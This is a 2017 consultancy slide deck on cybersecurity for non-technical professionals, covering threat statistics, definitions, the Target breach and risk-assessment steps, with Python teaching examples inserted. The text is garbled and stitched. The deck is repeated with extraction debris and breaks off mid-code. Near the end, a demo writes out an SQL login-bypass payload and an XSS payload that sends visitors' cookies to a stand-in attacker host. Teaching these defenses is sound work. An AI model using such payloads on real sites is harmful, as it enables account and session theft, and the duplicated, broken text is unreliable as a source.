What non-technical professionals need to know to navigate the cybersecurity landscape
TECHNOLOGY & CYBERSECURITY
October 27, 2017
David Losacco, CPA, CISA | Principal
© Stinnett & Associates LLC
Personal Introduction
Background
• Graduated from TU with a Bachelor's Degree in Accounting and MIS
• Dad of four: Sophie (17), Zoe (15), Sadie (12), Rocco (8)
• Started career as an ERP Systems Implementation Consultant, then spent 10 years with PricewaterhouseCoopers (PwC)
• Joined Stinnett & Associates as a Principal in 2006
• Holds CPA, CIA and CISA certifications
• Significant experience in Business Process and IT Consulting, IT and Application Controls, and Risk Management
• Industries include energy (with heavy upstream focus), manufacturing and telecommunications
Interests
• Golf (four kids limit my opportunities)
• Did I mention the four kids? Interests are limited.
• The Great Circus that is our Political System
• Vegas during March Madness
DISCLAIMER
• The comments and statements in this presentation are the opinions of the speakers and do not necessarily reflect the opinions or positions of Stinnett & Associates LLC.
• This presentation is the property of Stinnett & Associates LLC. All rights reserved. No part of this document may be reproduced, transmitted or otherwise distributed in any form without written permission from Stinnett & Associates LLC.
• Stinnett & Associates LLC expressly disclaims any liability in connection with the use of this presentation or its contents by any third party.
FIRM BACKGROUND
Stinnett & Associates LLC (Stinnett) is a professional advisory firm which excels at maximizing value for both public and private organizations. Our services are designed to help clients more effectively manage risk and improve performance by streamlining processes, reducing costs and enhancing controls.
Stinnett offers co-source and outsource solutions within a diverse range of services, including:
• Process Design and Re-engineering
• Internal Audit
• Governance, Risk and Compliance
• Sarbanes-Oxley
• Fraud Investigation
• Fraud Risk Assessment
• Cost Recovery
• Information Technology
• Enterprise Risk Management
Doing the Right Thing
Founded in 2001, Stinnett has grown to have offices in Dallas, Denver, Houston, Oklahoma City, San Antonio and Tulsa. We provide services to several Fortune 1000 companies as well as many mid to large size organizations with global operations.
We are primarily recognized for offering relevant advisory assistance and exemplary client service with the unique ability to deliver what our clients need. Working toward solutions, we have a reputation for "doing the right thing."
Stinnett is a certified Women's Business Enterprise through the Women's Business Enterprise National Council. We pride ourselves on being trusted business advisors who focus on assisting clients to reach strategic milestones, positioning them for future success.
LEARNING OBJECTIVES
• Why should we be concerned with cybersecurity?
• What are some key cybersecurity definitions?
• What are some emerging cybersecurity trends and threats?
• What happened with some recent high-profile cybersecurity attacks?
• What are some cybersecurity roadblocks?
• What are steps to evaluate your company's cybersecurity risk level?
• How can you take preventive measures and protect yourself and your company?
MY FIRST INTRODUCTION TO A CYBER CRIMINAL
WHAT DO ALL OF THESE ORGANIZATIONS HAVE IN COMMON?
…AND THESE?
…THEY ALL HAVE AT LEAST TWO THINGS IN COMMON
ALL HAVE BEEN VICTIMS OF CYBER ATTACK & BREACH
ALL HAD SOMETHING OF VALUE TO THE ATTACKER
LIST OF RECENT HEADLINES
WHY DO WE CARE?
Security compromises are a persistent business risk.
• US Department of Commerce estimates intellectual property theft costs US companies $250 billion annually
• In 2015, 38% more security incidents were detected than in 2014
• 70% of cyber attacks and data breaches go undetected
• 69% of organizations learn of their breach from an outside entity such as law enforcement, customers or suppliers
• Data breaches cost companies an average of $154 per compromised record
• Cyberinsurance market will reach $7.5 billion in annual sales by 2020, up from $2.5 billion in 2016
• Cyber crime costs estimated to reach $2 trillion by 2019
• 20% of small and mid-size businesses have been cyber crime targets
Sources: PwC, Global State of Information Security Survey 2016; US Dept. of Commerce, "Stolen Intellectual Property Harms American Businesses, Says Acting Deputy Secretary Blank," 2012; IBM and Ponemon, 2015 Cost of Data Breach Study: Global Analysis
FINANCIAL GAIN STILL #1 REASON
Financial gain is still the #1 factor for cyber attacks and breaches, at over 75% in 2015. Espionage and other factors combined still make up less than 25%.
• Personally Identifiable Information (PII) is worth more on the black market ("The Dark Web") than credit card numbers
• Ransomware payments estimated at over $1 billion in 2016
• 70% of all ransomware was paid
• 20% paid over $20,000
Source: Verizon Data Breach Investigations Report 2016
METHODS OF FINANCIAL GAIN
Cyber criminals have multiple means to achieve financial gain:
• Theft of funds (bank accounts)
• Extortion (ransomware)
• Selling of stolen credit cards
• Selling of PII data
• Insider trading information
• Using a compromised environment for other attacks or for rent
THE TYPES OF CYBER ATTACKS AND EXPLOITS ARE CHANGING
The types of exploits used are changing.
• Server attacks, once at 50%, are trending down
• User device and person attacks are both trending upward at nearly the same pace due to malware, ransomware and phishing attacks
Source: Verizon Data Breach Investigations Report 2016
CYBERSECURITY DEFINED
The body of technologies, processes and practices designed to protect networks, computers, programs and data from attack, damage or unauthorized access.
Cybersecurity is usually considered a sub-set of Information Security, but can require the consideration of:
• Application Security
• Operating System and Network Security
• Usage of specific Intrusion Detection and Prevention software and tools
• User Training and Education
• Disaster Recovery and Business Continuity considerations
• Really, anything to help prevent, detect or recover from a cyberattack
CYBER ATTACK DEFINED
The deliberate exploitation of computer systems, technology-dependent enterprises and networks. Cyber attacks can use malicious code, weak passwords or other cyber exploits to gain unlawful access to systems and data, often resulting in disruptive consequences that can compromise data and lead to cybercrimes such as information and identity theft.
Cyber attacks often include the following:
• Identity theft, fraud, extortion
• Malware, pharming, phishing, spamming, spoofing, spyware, Trojans and viruses
• Stolen hardware, such as laptops or mobile devices
• Denial-of-service and distributed denial-of-service attacks
• Breach of access
• Password sniffing
• System infiltration
• Website defacement
• Private and public Web browser exploits
• Instant messaging abuse
• Intellectual property (IP) theft or unauthorized access
CYBERSECURITY COMMON TERMS AND DEFINITIONS
Information Technology (IT) – The typically corporate department that handles the corporate software and hardware that runs the normal functions of a typical business or enterprise; the department within a company that is charged with establishing, monitoring and maintaining information technology systems and services.
Operational Technology (OT) – The hardware and software that detects or causes a change through the direct monitoring and/or control of physical devices, processes and events in the enterprise. OT technology and departments are usually found within manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition (SCADA) systems. OT devices and environments are typically run separately from IT departments. These are the devices that communicate with pipelines and electrical grids (and nuclear power plants).
Internet of Things – A computing concept that describes the idea of everyday physical devices (DVR systems, thermostats, refrigerators, vehicles) being connected to the internet and being able to identify themselves to other devices, which enables the devices to collect and exchange data.
Bot – A bot is a software "robot" that performs an extensive set of automated tasks on its own. Bots can perform an extensive set of destructive tasks as well as introduce many forms of malware to your system or network. They can also be used by black hats to coordinate attacks by controlling botnets.
Botnet – A number of Internet-connected devices (e.g. computers, DVR systems and other devices), each of which is running one or more bots after being infected with malware. Botnets can be used to perform Distributed Denial of Service attacks, steal data, send spam and allow the attacker access to the device and its connection. Botnets can be rented out to other hackers or cyber criminals.
Denial of Service (DoS) and Distributed Denial of Service – A type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. A Distributed DoS is the same as a DoS attack but involves multiple computers attacking the network from multiple locations. Typically the computers being used are infected and part of a botnet.
Middleware – Software that facilitates exchange of data between two application programs within the same environment or across different hardware and network environments. Three basic types of middleware are (1) communication middleware, (2) database middleware and (3) system middleware.
Man-in-the-Middle (MITM) Attacks – An attack occurrence where the attacker has been able to place themselves in the middle of communications between two parties. The attacker is able to alter or obtain data for themselves while unknown to the other two parties.
SQL Injection and Cross-site Scripting Attacks – An attack occurrence where the attacker injects malicious code into a website. In SQL Injection, the attacker uses SQL language to obtain information back from the website that was unintended. In Cross-site Scripting, the attacker injects code that only impacts other users of the website.
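To make the two definitions concrete, here is an added example (not part of the original presentation) in Python: a user lookup written the defective way beside the parameterised fix, and a comment renderer with and without HTML encoding. The table, user names and inputs are constructed for the demonstration.

```python
import html
import sqlite3

# Constructed sample data for the demonstration (not real customer records).
SAMPLE_USERS = [
    ("alice", "alice@example.com"),
    ("bob", "bob@example.com"),
    ("carol", "carol@example.com"),
]


def build_db() -> sqlite3.Connection:
    """Create an in-memory table that stands in for a website's user store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def find_email_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    """SQL injection defect: user input is pasted into the SQL text, so the
    input can change the query's meaning instead of being treated as a value."""
    query = f"SELECT email FROM users WHERE name = '{name}'"
    return [row[0] for row in conn.execute(query)]


def find_email_safe(conn: sqlite3.Connection, name: str) -> list:
    """The fix: a parameterised query. The driver passes the value separately
    from the SQL text, so quotes and keywords in the input are never parsed
    as SQL; the input can only ever match a literal name."""
    query = "SELECT email FROM users WHERE name = ?"
    return [row[0] for row in conn.execute(query, (name,))]


def render_comment_unsafe(comment: str) -> str:
    """Cross-site scripting defect: untrusted text is placed straight into
    the HTML that other visitors' browsers will interpret."""
    return f"<div class='comment'>{comment}</div>"


def render_comment_safe(comment: str) -> str:
    """The fix: encode the text for its HTML context so markup characters
    are displayed literally rather than interpreted."""
    return f"<div class='comment'>{html.escape(comment, quote=True)}</div>"


if __name__ == "__main__":
    db = build_db()
    # A legitimate lookup behaves identically either way.
    print(find_email_vulnerable(db, "alice"))
    print(find_email_safe(db, "alice"))
    # Input containing a quote and SQL: the defective query returns every
    # row, the parameterised one matches nothing (no user has that name).
    tainted = "x' OR '1'='1"
    print(find_email_vulnerable(db, tainted))
    print(find_email_safe(db, tainted))
    # Markup in a comment: only the encoded version is safe to show others.
    print(render_comment_unsafe("<script>alert('hi')</script>"))
    print(render_comment_safe("<script>alert('hi')</script>"))
```

The same two rules (never build SQL from strings; always encode output for its context) are the controls an auditor should look for when reviewing the web applications named later in the deck.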
Common Vulnerabilities and Exposures (CVE) – Catalog sponsored by Homeland Security that documents known cyber threats. Vulnerabilities are known errors in a system or software that provide an attacker with direct access. Exposures are known errors that allow an attacker indirect access, which may allow the attacker to gather knowledge or content. Many of the malwares and cyber attacks in the news resulted from attackers utilizing a vulnerability that had been known and fixed by the vendor for several months or years, but not fixed at the company level.
Zero Day Vulnerability/Attack – An unknown or newly discovered vulnerability that has not yet been fixed by the software or system provider. Zero day vulnerabilities are the most difficult to protect against and detect due to the lack of knowledge and support by the vendor.
Advanced Persistent Threat – A set of stealthy and continuous computer hacking processes, often orchestrated by a person or persons targeting a specific entity.
Dark Web / Darknet – Websites located on the internet that are not accessible by normal search engines or means. Darknet sites require special software such as TOR (The Onion Router) that helps keep users anonymous. Darknet sites are used for several illegal activities such as black market purchasing of stolen PII or credit card data, as well as botnet rentals. Bitcoins are traded on the Dark Web.
Bitcoin – A digital currency created in 2009. There are no physical bitcoins, only balances kept on a public ledger in the cloud that – along with all Bitcoin transactions – is verified by a massive amount of computing power. Bitcoin mining is the process through which bitcoins are released to come into circulation and involves solving a computationally difficult puzzle to discover a new block, which is added to the blockchain, and receiving a reward in the form of a few bitcoins. As more and more bitcoins are created, the difficulty of the mining process – that is, the amount of computing power involved – increases.
PHISHING
A form of social engineering in which a message, typically an email with a malicious attachment or link, is sent to a victim with the intent of tricking the recipient to open an attachment.
Spear-Phishing – Phishing attacks directed at a specific individual or company. Sub-categories of spear phishing include Cloning (using a previous legitimate email) and Whaling (attacking a high level executive).
• CEO email to Treasurer
• HR phishing for employee data
• W-2 phishing data (IRS sent out warning)
The majority of phishing cases are used as a means to install malware onto a host environment.
PHISHING
Most companies battle the increase in phishing and spear-phishing attacks by labeling each external email with some form of the following inserts:
MALWARE
Malware is short for malicious software. Malware is a broad term that encompasses computer viruses, worms, Trojan horses, spyware, adware and now ransomware. Malware is designed to interfere with normal computer operation, usually giving hackers a chance to gain access to your computer and collect sensitive personal information.
• Malware is seen as the first access point used in connection with hacking attempts
• Ransomware is the latest version of malware that has been in the headlines and represents one of the largest cyber threats to most companies
Source: Verizon Data Breach Investigations Report 2016
RANSOMWARE
A type of malware that prevents or limits users from accessing their system, either by locking the system's screen or by locking the users' files, unless a ransom is paid. Ransomware typically encrypts certain file types on infected systems and forces users to pay the ransom through certain online payment methods to get a decrypt key.
• The use of bitcoins is typically the payment method
• Ransomware attacks quadrupled to 4,000 per day from 2015 to 2016
• This year's WannaCry ransomware attack impacted over 200,000 people across 150 countries (included a worm)
COMMON CYBER ATTACK PATTERNS
Common attack patterns account for a vast majority of documented breaches.
• 78% of all breaches result from these 5 attack patterns:
  - Web app attacks
  - POS intrusions
  - Privilege misuse
  - Cyber-espionage
  - Crimeware
• 63% of all breaches are attributable to the top 2 alone
Source: Verizon Data Breach Investigations Report 2016
WEB APP ATTACKS
• Modern websites with business functionality increase the impact of a successful breach
• Recycled or unchanged default passwords can compromise an organization's security efforts
• Breaching a web application can open the gates to internal applications and code
• Cross-site scripting and SQL injection are the most common attack attempts
Source: Verizon Data Breach Investigations Report 2016
POINT-OF-SALE (POS) INTRUSIONS
• Attackers target systems capturing customer payment information during legitimate transactions
• Attacks can exploit POS software or hardware
• Attackers commonly target POS system vendors as a means to exploit an organization's POS system
• Retail and accommodation sites are experiencing massive POS attacks
Source: Verizon Data Breach Investigations Report 2016
PRIVILEGE MISUSE
• Internal parties act (maliciously or not) in a way that causes a breach
• Most actors are outside Executive Management and leadership roles
• While financial reasons still motivate most actors, espionage has become an increasingly common motivation
• Most breaches take months or longer to discover
Source: Verizon Data Breach Investigations Report 2016
CYBER-ESPIONAGE
• External parties (possibly state-affiliated or organized crime) infiltrating an organization's systems
• Attacks commonly begin through phishing and/or exploiting backdoors in software (browsers or even websites)
• Over 90% of breaches target trade secrets for exfiltration
Source: Verizon Data Breach Investigations Report 2016
CRIMEWARE
• Crimeware contains any malware or other incident that focuses directly on financial opportunity
• Ransomware, keyloggers and use of backdoors are the most common occurrences of crimeware
• Crimeware is typically introduced through the following:
  - Email attachment
  - Cross-site scripting from a visited website
  - Email link
Source: Verizon Data Breach Investigations Report 2016
KEY CYBER ATTACKS IN THE NEWS
• Target Data Breach – 70 million PII records of users and 40 million credit cards stolen
• Sony Attack – Malware attack that erased over half of the company's servers and PCs and released 4 unreleased movies and over 45,000 social security numbers
• Yahoo Data Breach (2013/2014) – August breach that exposed PII of 1 billion users; 2014 data breach of 500 million users; additional data loss in 2016
• Prepaid Card/ATM Scheme (2013) – $45 million stolen (worldwide)
• Bank of Bangladesh (February 2016) – $81 million stolen
COMPLEXITY BEHIND THE TARGET ATTACK
• Cyber attackers first attacked a third party vendor (the HVAC vendor) through use of malware introduced via a phishing campaign
• Used the HVAC vendor's stolen credentials to gain access to a third party website used for submitting electronic invoices
• Injected code into a vulnerability of the electronic submission process to gain further access to Target's internal network
• Recon'ed the environment and obtained domain administrator access
• Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location; worked around firewalls and other defenses
• Gained access to a server that contained a SQL database and were able to download 70 million PII records of customers
• Attackers then gained access to the POS environment (should have been walled off)
• Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
• Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
• Attackers then copied the credit card files to another server that had remote FTP ability and sent the files to themselves
RANSOMWARE – ANATOMY OF AN ATTACK
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity, how to evaluate what is enough, or how to recover when their best efforts still result in a cyber breach. Main reasons for companies' struggles are:
• Expansion of the attack surface
• Continued innovations in technology
• Lack of understanding of the company's information assets and the assets' value
• Failure to properly understand threats and risks
• Failure to implement core security protocols and procedures
• Lack of skilled resources (people and time)
• Lack of funds
CYBERSECURITY DEFENSE IN-DEPTH
PEOPLE | PROCESSES | TECHNOLOGY
THE PEOPLE CHALLENGE: Humans remain one of the weakest links in the security chain. Ensure you have a strong security awareness training program.
THE TECHNOLOGY CHALLENGE: The increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential.
THE PROCESS CHALLENGE: Ensure best practice processes and associated management frameworks are in place. Regular audits and reviews are important.
IMPLEMENTING A CYBERSECURITY PROGRAM
• Understand the organizational risk and where high risk assets exist
• Risk assessments should be performed annually or when significant changes to the environment occur
• Stinnett uses Microsoft STRIDE Threat Modeling to semi-qualitatively measure cybersecurity risks in order to identify, estimate and prioritize information security risks
Risk assessment flow: (1) Identification of Assets → (2) Asset Locations → (3) Classification of Assets → (4) Threat Modeling → (5) Calculated Risk Results
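As an added illustration of the five-step flow above (not Stinnett's own tooling or scoring scale), the following Python sketch carries a constructed asset inventory through location, classification and STRIDE threat modeling to a prioritized risk list. The 1–5 likelihood/impact scale, the classification weights and the multiplicative score are assumptions chosen for the example.

```python
from dataclasses import dataclass

# Microsoft's STRIDE threat categories, used in step (4) Threat Modeling.
STRIDE = {
    "S": "Spoofing",
    "T": "Tampering",
    "R": "Repudiation",
    "I": "Information disclosure",
    "D": "Denial of service",
    "E": "Elevation of privilege",
}

# Assumed weights for step (3) Classification of Assets (not the firm's
# scale): the more sensitive the class, the more a realised threat costs.
CLASSIFICATION_WEIGHT = {"Public": 1, "Internal": 2, "Confidential": 3, "Restricted": 4}


@dataclass
class Asset:
    name: str            # step (1) Identification of Assets
    location: str        # step (2) Asset Locations
    classification: str  # step (3) Classification of Assets
    # step (4): STRIDE code -> (likelihood, impact), each on an assumed 1-5 scale
    threats: dict


def threat_score(likelihood: int, impact: int, classification: str) -> int:
    """Assumed semi-qualitative score: likelihood x impact x class weight."""
    for value in (likelihood, impact):
        if not 1 <= value <= 5:
            raise ValueError("likelihood and impact must be on a 1-5 scale")
    return likelihood * impact * CLASSIFICATION_WEIGHT[classification]


def calculate_risk(assets):
    """Step (5) Calculated Risk Results: every (asset, threat) pair scored and
    sorted highest risk first, so remediation effort goes to the top rows."""
    results = []
    for asset in assets:
        for code, (likelihood, impact) in asset.threats.items():
            score = threat_score(likelihood, impact, asset.classification)
            results.append((score, asset.name, STRIDE[code], asset.location))
    results.sort(key=lambda row: (-row[0], row[1], row[2]))
    return results


def risk_register(assets, top=None) -> str:
    """Render the prioritized results as the register handed to management."""
    lines = ["Score  Asset                   Threat                     Location"]
    for score, name, threat, location in calculate_risk(assets)[:top]:
        lines.append(f"{score:>5}  {name:<23} {threat:<26} {location}")
    return "\n".join(lines)


# Constructed inventory using the asset types named on the slides.
SAMPLE_ASSETS = [
    Asset("Credit card data", "POS servers / payment DB", "Restricted",
          {"I": (4, 5), "T": (2, 4), "D": (2, 3)}),
    Asset("Employee records (PII)", "HR application", "Confidential",
          {"I": (4, 4), "S": (3, 3)}),
    Asset("Bank accounts", "Treasury workstation", "Restricted",
          {"S": (3, 5), "E": (2, 5)}),
    Asset("Trade secrets", "Engineering file share", "Confidential",
          {"I": (3, 5), "R": (2, 2)}),
    Asset("Marketing website", "Hosted web server", "Public",
          {"T": (3, 2), "D": (4, 2)}),
]

if __name__ == "__main__":
    print(risk_register(SAMPLE_ASSETS, top=5))
```

Re-running the same inventory after a significant environment change (the annual trigger named above) makes the change in ranking visible rather than leaving it to judgment.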
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Company's information assets.
• What value do the assets have?
  - Credit card data
  - Employee or customer records
  - Bank accounts
  - Intellectual property
  - Trade secrets
  - Insider knowledge
• Who would want the data?
• Data location
BASELINE GAP ANALYSIS
• Perform walkthroughs with the information technology department to understand cybersecurity controls in place
• Evaluate control design as it relates to commonly accepted framework(s)
• Identify control gaps and create a baseline for cybersecurity maturity in the organization
CYBERSECURITY FAILURES AND FIXES
Patch Management – A patch management process is a company's strategy around ensuring the company's IT devices are properly updated (patched) to reflect the latest software update or release from the vendor. Most companies fail to implement sound patch management processes and procedures, which includes:
• 99% of exploited vulnerabilities were compromised more than a year after the patch was published
• Companies do not know all of the information devices in their network and therefore are unable to adequately assess their patch management process
User and Administrator Level Access – Companies fail to adequately assess user access levels to ensure that the principle of Least Privilege is applied as much as possible. Within the IT department, the failure of Least Privilege can result in multiple individuals and IDs with access and/or knowledge of higher level functions within the environment.
User Cybersecurity Training and Awareness – Companies often fail to implement basic end user training around cybersecurity. Oftentimes the uneducated or untrained end user is the cyber attacker's first entry point into the company.
FIXES
• Obtain at least a basic understanding of your critical information assets, where they are stored and how they are protected
• Perform an inventory of IT devices and assess each device's risk relating to patches
• Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe, Java, browsers, operating systems)
• Perform an inventory of all user and admin IDs. Understand the access each ID has in your environment and why that access level is necessary. Assess whether password levels and parameters are adequate (password length, characters and change interval)
• Implement a continual end user training program
• Ensure backups and recovery plans work as intended and are properly segregated
QUESTIONS?
www.STINNETT-ASSOCIATES.com | 888.808.1795
Stinnett & Associates, 8811 S. Yale Ave., Suite 300, Tulsa, OK 74137
Main Number: 918.728.3300
ContactUs@Stinnett-Associates.com
October 27 2017
TECHNOLOGY amp CYBERSECURITY
David Losacco
copyStinnett amp Associates LLC3
Personal Introduction
Graduated from TU with a Bachelorrsquos Degree in Accounting and MIS
Dad of Four Sophie (17) Zoe (15) Sadie (12) Rocco (8)
Started Career as an ERP Systems Implementation Consultant then spent 10 years with PricewaterhouseCoopers (PwC)
Joined Stinnett amp Associates as a Principal in 2006
Has his CPA CIA and CISA certifications
Significant experience in Business Process and IT Consulting IT and Application Controls and Risk Management
Industries include energy with heavy upstream focus manufacturing and telecommunications
Background
Interests
Golf four kids limit my opportunities
Did I mention the four kids Interests are limited
The Great Circus that is our Political System
Vegas during March Madness
copyStinnett amp Associates LLC
DISCLAIMER
bull The comments and statements in this presentation are the opinions of the speakers and do not necessarily reflect the opinions or positions of Stinnett amp Associates LLC
bull This presentation is the property of Stinnett amp Associates LLC All rights reserved No part of this document may be reproduced transmitted or otherwise distributed in any form without written permission from Stinnett amp Associates LLC
bull Stinnett amp Associates LLC expressly disclaims any liability in connection with the use of this presentation or its contents by any third party
4
copyStinnett amp Associates LLC
FIRM BACKGROUND
5
Stinnett amp Associates LLC (Stinnett) is a professional advisory firm which excels at maximizing value for both public and private
organizations Our services are designed to help clients more effectively manage risk and improve performance by streamlining processes
reducing costs and enhancing controls
Stinnett offers co-source and outsource solutions within a diverse range of services including
Process Design and Re-engineering Internal AuditGovernance Risk and Compliance
Sarbanes-Oxley Fraud Investigation Fraud Risk Assessment
Cost Recovery Information Technology Enterprise Risk Management
Doing the Right Thing
Founded in 2001 Stinnett has grown to have offices in Dallas Denver Houston Oklahoma City San
Antonio and Tulsa We provide services to several Fortune 1000 companies as well as many mid to
large size organizations with global operations
We are primarily recognized for offering relevant advisory assistance and exemplary client service with
the unique ability to deliver what our clients need Working toward solutions we have a reputation for
ldquodoing the right thingrdquo
Stinnett is a certified Womenrsquos Business Enterprise through the Womenrsquos Business
Enterprise National Council We pride ourselves on being trusted business advisors
who focus on assisting clients to reach strategic milestones positioning them for
future success
copyStinnett amp Associates LLC
LEARNING OBJECTIVES
bull Why should we be concerned with cybersecurity
bull What are some key cybersecurity definitionsbull What are some emerging cybersecurity trends
and threatsbull What happened with some recent high-profile
cybersecurity attacksbull What are some cybersecurity roadblocksbull What are steps to evaluate your companyrsquos
cybersecurity risk levelbull How can you take preventive measures and
protect yourself and your company
6
copyStinnett amp Associates LLC
MY FIRST INTRODUCTION TO A CYBER CRIMINAL
7
copyStinnett amp Associates LLC
WHAT DO ALL OF THESE ORGANIZATIONS HAVE IN COMMON
8
copyStinnett amp Associates LLC
hellipAND THESE
9
copyStinnett amp Associates LLC
hellipTHEY ALL HAVE AT LEAST TWO THINGS IN COMMON
10
ALL HAVE BEEN VICTIMS OF CYBER ATTACK amp BREACH
ALL HAD SOMETHING OF VALUE TO THE ATTACKER
copyStinnett amp Associates LLC11
LIST OF RECENT HEADLINES
copyStinnett amp Associates LLC
WHY DO WE CARE
12
Security compromises are a persistent business risk
bull US Department of Commerce estimates intellectual
property theft costs US companies $250 billion
annually
bull In 2015 38 more security incidents were
detected than in 2014
bull 70 of cyber attacks and data breaches go
undetected
bull 69 of organizations learn of their breach from an
outside entity such as law enforcement customers
or suppliers
bull Data breaches cost companies an average of $154
per compromised record
bull Cyberinsurance market will reach $75 billion in
annual sales by 2020 up from $25 billion in 2016
bull Cyber Crime costs estimated to reach $2 Trillion by
2019
bull 20 of small and mid-size businesses have been
cyber crime targets
Source PwC Global State of Information Security Survey 2016US Dept of Commerce Stolen Intellectual Property Harms American Businesses Says Acting Deputy Secretary Blank 2012IBM and Ponemon 2015 Cost of Data Breach Study Global Analysis
copyStinnett amp Associates LLC
FINANCIAL GAIN STILL 1 REASON
13
Financial Gain is still the 1 factor for cyber attacks and breaches at over 75 in 2015
Espionage and other factors combined still make up less than 25
bull Personally Identifiable Information
(PII) is worth more on the black
market (ldquoThe Dark Webrdquo) then Credit
Card Numbers
bull Ransomware payments estimated
over $1 billion in 2016
bull 70 of all Ransomware was paid
bull 20 paid over $20000
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
METHODS OF FINANCIAL GAIN
Cyber criminals have multiple means to achieve financial gain
14
bull Theft of funds (Bank Accounts)bull Extortion (Ransomware)bull Selling of stolen credit cardsbull Selling of PII databull Insider trading informationbull Using compromised environment for other
attacks or for rent
copyStinnett amp Associates LLC
THE TYPES OF CYBER ATTACKS AND EXPLOITS ARE CHANGING
15
bull Server Attacks once at 50 are
trending down
bull User Device and Person attacks are
both trending upward at nearly same
pace due to Malware Ransomware
and Phishing attacks
The types of exploits used are changing
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CYBERSECURITY DEFINED
The body of technologies processes and practices
designed to protect networks computers programs and
data from attack damage or unauthorized access
Cybersecurity is usually considered a sub-set of
Information Security but can require the consideration of
bull Application Security
bull Operating System and Network security
bull Usage of Specific Intrusion Detection and Prevention
Software and tools
bull User Training and Education
bull Disaster Recovery and Business Continuity Considerations
bull Really Anything to help prevent detect or recover from a
Cyberattack
16
copyStinnett amp Associates LLC
CYBER ATTACK DEFINED
The deliberate exploitation of computer systems, technology-dependent enterprises and networks. Cyber attacks can use malicious code, weak passwords or other exploits to gain unlawful access to systems and data, often with disruptive consequences that compromise data and lead to cybercrimes such as information and identity theft.
Cyber attacks often include the following:
• Identity theft, fraud, extortion
• Malware, pharming, phishing, spamming, spoofing, spyware, Trojans and viruses
• Stolen hardware such as laptops or mobile devices
• Denial-of-service and distributed denial-of-service attacks
• Breach of access
• Password sniffing
• System infiltration
• Website defacement
• Private and public web browser exploits
• Instant messaging abuse
• Intellectual property (IP) theft or unauthorized access
CYBERSECURITY COMMON TERMS AND DEFINITIONS
Information Technology (IT) – The corporate department charged with establishing, monitoring and maintaining the software, hardware and services that run the normal functions of a business or enterprise.
Operational Technology (OT) – The hardware and software that detects or causes a change through direct monitoring and/or control of physical devices, processes and events in the enterprise. OT departments are usually found in manufacturing and industrial environments and include industrial control systems (ICS) such as Supervisory Control and Data Acquisition (SCADA) systems. OT devices and environments are typically run separately from IT departments. These are the devices that communicate with pipelines and electrical grids (and nuclear power plants).
Internet of Things (IoT) – A computing concept in which everyday physical devices (DVRs, thermostats, refrigerators, vehicles) are connected to the internet and can identify themselves to other devices, enabling them to collect and exchange data. Many such devices ship with default passwords and no practical way to patch them, which is why they turn up in the botnets defined below.
Bot – A software "robot" that performs an extensive set of automated tasks on its own. Bots can perform destructive tasks and introduce many forms of malware to a system or network; attackers ("black hats") also use them to coordinate attacks by controlling botnets.
Botnet – A number of internet-connected devices (computers, DVRs and other devices) that have been infected with malware, each running one or more bots under the attacker's control. Botnets are used to perform distributed denial of service attacks, steal data, send spam and give the attacker access to each device and its network connection. Botnets are rented out to other hackers and cyber criminals.
Denial of Service (DoS) and Distributed Denial of Service (DDoS) – An attack designed to bring a network or service to its knees by flooding it with useless traffic. A DDoS attack is a DoS attack launched from many computers in many locations at once; typically those computers are members of a botnet.
Middleware – Software that facilitates the exchange of data between two application programs within the same environment or across different hardware and network environments. Three basic types of middleware are (1) communication middleware, (2) database middleware and (3) system middleware.
Man-in-the-Middle (MITM) Attack – An attack in which the attacker has placed themselves in the middle of the communication between two parties. The attacker can read or alter the data passing between them without either party knowing. Encrypting and authenticating the channel (for example, TLS with proper certificate validation) is the usual defense.
SQL Injection and Cross-site Scripting (XSS) Attacks – Attacks in which the attacker injects malicious input into a website. In SQL injection, the attacker's input is interpreted as part of a database query, letting them read or change data the website never intended to expose. In cross-site scripting, the attacker injects script into a page that the website then serves to other users, so the script runs in those users' browsers. Both have the same root cause and the same cure: never paste untrusted input into a query or a page; use parameterized queries and encode output.
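The two injection attacks just defined, shown side by side with their fixes in a small added example written for this page in Python (it is not code from the presentation). The users table, the `alice` account and the payloads are constructed for the demonstration; the "vulnerable" functions are deliberately written the wrong way so the effect of each payload is visible:

```python
import html
import sqlite3


# Constructed sample data (not from the presentation): one user in an in-memory DB.
# Real systems store password hashes, never plaintext; plaintext here keeps the
# injection effect easy to see.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse battery')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation: user input becomes SQL syntax."""
    query = ("SELECT COUNT(*) FROM users WHERE username = '" + username +
             "' AND password = '" + password + "'")
    return conn.execute(query).fetchone()[0] > 0


def login_safe(conn, username, password):
    """Parameterized query: the driver binds the input as data, never as SQL."""
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()[0] > 0


def render_comment_vulnerable(comment):
    """Reflects user text straight into HTML: a <script> tag runs in every viewer's browser."""
    return '<p class="comment">' + comment + "</p>"


def render_comment_safe(comment):
    """Output-encodes the text so the browser displays the characters instead of executing them."""
    return '<p class="comment">' + html.escape(comment, quote=True) + "</p>"


def demo():
    conn = make_db()
    # Classic SQL-injection payload: closes the quoted string, then comments out the
    # rest of the query (including the password check).
    sqli_user = "alice' --"
    # Classic stored-XSS payload: ships every other visitor's session cookie to the attacker.
    xss_comment = "<script>location='http://attacker.invalid/?c='+document.cookie</script>"
    return {
        "vulnerable_login_bypassed": login_vulnerable(conn, sqli_user, "wrong"),
        "safe_login_bypassed": login_safe(conn, sqli_user, "wrong"),
        "legit_login_safe": login_safe(conn, "alice", "correct horse battery"),
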